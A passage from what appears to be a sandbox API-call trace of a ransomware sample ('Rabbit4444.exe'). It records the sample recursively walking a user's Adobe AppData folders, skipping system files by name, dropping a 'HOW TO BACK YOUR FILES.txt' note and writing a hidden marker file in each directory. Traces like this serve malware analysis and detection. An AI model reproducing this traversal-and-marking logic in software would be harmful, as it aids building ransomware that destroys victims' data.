Size=0x5e) returned 0x11c5e0 [0054.384] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6670 | out: ListHead=0xf68b0, ListEntry=0xf6670) returned 0xf6510 [0054.384] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x523a5f8d, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x523a5f8d, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0054.384] lstrcmpiW (lpString1="Linguistics", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.384] lstrcmpiW (lpString1="Linguistics", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.384] lstrcmpiW (lpString1="Linguistics", lpString2="Rabbit4444.exe") returned -1 [0054.384] lstrcmpiW (lpString1="Linguistics", lpString2=".") returned 1 [0054.384] lstrcmpiW (lpString1="Linguistics", lpString2="..") returned 1 [0054.384] lstrcmpiW (lpString1="Linguistics", lpString2="windows") returned -1 [0054.384] lstrcmpiW (lpString1="Linguistics", lpString2="bootmgr") returned 1 [0054.384] lstrcmpiW (lpString1="Linguistics", lpString2="pagefile.sys") returned -1 [0054.384] lstrcmpiW (lpString1="Linguistics", lpString2="boot") returned 1 [0054.384] lstrcmpiW (lpString1="Linguistics", lpString2="ids.txt") returned 1 [0054.384] lstrcmpiW (lpString1="Linguistics", lpString2="NTUSER.DAT") returned -1 [0054.384] lstrcpyW (in: lpString1=0x130eb86, lpString2="Linguistics" | out: lpString1="Linguistics") returned="Linguistics" [0054.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0054.384] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x66) returned 0x120568 [0054.384] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6670 [0054.384] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x523a5f8d, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x523a5f8d, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 0 [0054.384] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0054.384] lstrcpyW (in: lpString1=0x130eb86, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.385] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.386] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.386] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.386] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.386] CloseHandle (hObject=0x278) returned 1 [0054.387] CloseHandle (hObject=0x27c) returned 1 [0054.387] GetCurrentThreadId () returned 0xd98 [0054.387] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0054.387] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics" [0054.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x120568 | out: hHeap=0xe0000) returned 1 [0054.387] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0054.387] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics" [0054.387] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\" [0054.387] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\.BFC0E91B00AE8A0620D3" [0054.387] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.388] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.390] FlushFileBuffers (hFile=0x27c) returned 1 [0054.394] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.394] CloseHandle (hObject=0x27c) returned 1 [0054.396] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics") returned 50 [0054.396] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.396] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x523a5f8d, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9bcc631, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0054.396] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.396] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.396] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.396] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.397] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7157dbce, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0x523a5f8d, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9bcc631, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.397] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.397] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.397] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.397] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.397] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.397] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9bcc631, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9bcc631, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9bf27fb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.397] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.397] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.397] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x523a5f8d, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x523a5f8d, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x523a5f8d, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UserDictionaries", cAlternateFileName="USERDI~1")) returned 1 [0054.397] lstrcmpiW (lpString1="UserDictionaries", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0054.397] lstrcmpiW (lpString1="UserDictionaries", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.397] lstrcmpiW (lpString1="UserDictionaries", lpString2="Rabbit4444.exe") returned 1 [0054.397] lstrcmpiW (lpString1="UserDictionaries", lpString2=".") returned 1 [0054.397] lstrcmpiW (lpString1="UserDictionaries", lpString2="..") returned 1 [0054.397] lstrcmpiW (lpString1="UserDictionaries", lpString2="windows") returned -1 [0054.397] lstrcmpiW (lpString1="UserDictionaries", lpString2="bootmgr") returned 1 [0054.397] lstrcmpiW (lpString1="UserDictionaries", lpString2="pagefile.sys") returned 1 [0054.397] lstrcmpiW (lpString1="UserDictionaries", lpString2="boot") returned 1 [0054.397] lstrcmpiW (lpString1="UserDictionaries", lpString2="ids.txt") returned 1 [0054.397] lstrcmpiW (lpString1="UserDictionaries", lpString2="NTUSER.DAT") returned 1 [0054.397] lstrcpyW (in: lpString1=0x130eb9e, lpString2="UserDictionaries" | out: lpString1="UserDictionaries") returned="UserDictionaries" [0054.397] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6488 [0054.397] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x88) returned 0x106390 [0054.397] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6490 | out: ListHead=0xf68b0, ListEntry=0xf6490) returned 0xf6670 [0054.397] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x523a5f8d, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x523a5f8d, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x523a5f8d, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UserDictionaries", cAlternateFileName="USERDI~1")) returned 0 [0054.397] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0054.397] lstrcpyW (in: lpString1=0x130eb9e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.397] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.399] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.399] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.400] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.400] CloseHandle (hObject=0x278) returned 1 [0054.400] CloseHandle (hObject=0x27c) returned 1 [0054.400] GetCurrentThreadId () returned 0xd98 [0054.400] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6490 [0054.400] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries" [0054.400] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x106390 | out: hHeap=0xe0000) returned 1 [0054.400] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6488 | out: hHeap=0xe0000) returned 1 [0054.400] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries" [0054.400] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\" [0054.400] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\.BFC0E91B00AE8A0620D3" [0054.400] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.402] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.404] FlushFileBuffers (hFile=0x27c) returned 1 [0054.406] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.406] CloseHandle (hObject=0x27c) returned 1 [0054.406] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries") returned 67 [0054.406] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.406] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x523a5f8d, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x523a5f8d, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9bf27fb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102910 [0054.406] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.406] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.406] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0054.406] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0054.406] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x523a5f8d, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x523a5f8d, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9bf27fb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0054.407] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.407] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0054.407] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0054.407] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0054.407] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0054.407] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xe9bf27fb, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xe9bf27fb, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xe9bf27fb, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0054.407] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.407] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0054.407] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x523a5f8d, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5e98cd3b, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5e98cd3b, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 1 [0054.407] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0054.407] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0054.407] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="Rabbit4444.exe") returned -1 [0054.407] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2=".") returned 1 [0054.407] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="..") returned 1 [0054.407] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="windows") returned -1 [0054.407] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="bootmgr") returned -1 [0054.407] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="pagefile.sys") returned -1 [0054.407] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="boot") returned -1 [0054.407] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="ids.txt") returned -1 [0054.407] lstrcmpiW (lpString1="Adobe Custom Dictionary", lpString2="NTUSER.DAT") returned -1 [0054.407] lstrcpyW (in: lpString1=0x130ebc0, lpString2="Adobe Custom Dictionary" | out: lpString1="Adobe Custom Dictionary") returned="Adobe Custom Dictionary" [0054.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6348 [0054.407] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb8) returned 0x10a2f0 [0054.407] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6350 | out: ListHead=0xf68b0, ListEntry=0xf6350) returned 0xf6670 [0054.407] FindNextFileW (in: hFindFile=0x102910, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x523a5f8d, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5e98cd3b, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0x5e98cd3b, ftLastWriteTime.dwHighDateTime=0x1d35e02, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 0 [0054.407] FindClose (in: hFindFile=0x102910 | out: hFindFile=0x102910) returned 1 [0054.407] lstrcpyW (in: lpString1=0x130ebc0, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0054.407] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0054.409] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x278 [0054.409] MapViewOfFile (hFileMappingObject=0x278, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0054.410] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0054.410] CloseHandle (hObject=0x278) returned 1 [0054.410] CloseHandle (hObject=0x27c) returned 1 [0054.410] GetCurrentThreadId () returned 0xd98 [0054.410] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0xf6350 [0054.410] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary" [0054.410] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10a2f0 | out: hHeap=0xe0000) returned 1 [0054.410] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf6348 | out: hHeap=0xe0000) returned 1 [0054.410] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary" [0054.410] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\" [0054.410] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\.BFC0E91B00AE8A0620D3" [0054.410] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\locallow\\adobe\\linguistics\\userdictionaries\\adobe custom dictionary\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0054.415] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0054.417] FlushFileBuffers (hFile=0x27c) returned 1 [0054.418] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0054.418] CloseHandle (hObject=0x27c) returned 1 [0054.419] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary") returned 91 [0054.419] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0054.419] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\LocalLow\\Adobe\\Linguistics\\UserDictionaries\\Adobe Custom Dictionary\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x523a5f8d, ftCreationTime.dwHighDateTime=0x1d35e02, ftLastAccessTime.dwLowDateTime=0x5ee23d84, ftLastAccessTime.dwHighDateTime=0x1d35e02, ftLastWriteTime.dwLowDateTime=0xe9c18a44, ftLastWriteTime.dwHighDateTime=0x1d54052, 